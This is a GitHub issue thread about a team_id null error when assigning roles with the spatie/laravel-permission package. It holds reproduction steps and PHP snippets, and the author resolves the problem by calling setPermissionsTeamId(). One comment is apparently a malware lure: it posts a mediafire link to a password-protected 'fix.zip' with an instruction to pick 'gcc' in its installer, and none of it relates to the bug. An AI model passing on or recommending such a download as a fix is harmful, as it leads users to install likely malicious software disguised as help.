### ISSUE TITLE
`User::assignRole()` is throwing `team_id` null exception even though it exists on role

### ISSUE THREAD

**Issue by tbhaxor** [spatie/laravel-permission#2710]
### Description

I have roles and permissions with team feature and when I try to assign the role to the newly created user (from invites), I am getting the following error.

![image](https://github.com/user-attachments/assets/05f90fcb-64e7-404f-bf5f-d94889d69d94)

As you can see the `team_id` value exists (not null) on the target role.

![image](https://github.com/user-attachments/assets/9d89aef5-e508-4e7e-9566-23fd15de3a4b)

### Steps To Reproduce

1. Setup the permission and roles as defined in [installation](https://spatie.be/docs/laravel-permission/v6/installation-laravel) and [teams](https://spatie.be/docs/laravel-permission/v6/basic-usage/teams-permissions) guide
2. Add `is_pre_canned` boolean field to migration file before executing `./artisan migrate`. I don't think so this will create problem.
3. Create the team from factory, it will also create roles on default guard (web) and assign team_id to each of them setting `is_pre_canned` to 1

    ```php
    $team = Team::factory()->create(); // the afterCreating hook will provision roles for this team
    ```

    ![image](https://github.com/user-attachments/assets/63f7100f-895e-4ed4-a002-1ba954a7b197)

5. Create user using factory and assign `team_id`

    ```php
    $user = User::factory()->create(['team_id' => $team->id])
    ```
6. Now assign the role to the user (I will choose the first role in the team)

    ```php
    $user->assignRole($user->team->roles->first())
    ```

It will give the same error

![image](https://github.com/user-attachments/assets/d46d3abc-6a9c-4f07-a65c-55b925f93e84)

> [!NOTE]
> I am not authorized to share the codebase with you, so please let me know if you need something. I will share after confirming with my manager.

### Example Application

It is a private application, I don't have link to it.

### Version of spatie/laravel-permission package:

6.9.0

### Version of laravel/framework package:

laravel/framework

### PHP version:

8.3

### Database engine and version:

mysql

### OS: Windows/Mac/Linux version:

Linux

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tbhaxor** [comment]
I missed `setPermissionsTeamId()` before assigning role. It works now, but technically it should take the team from the role.
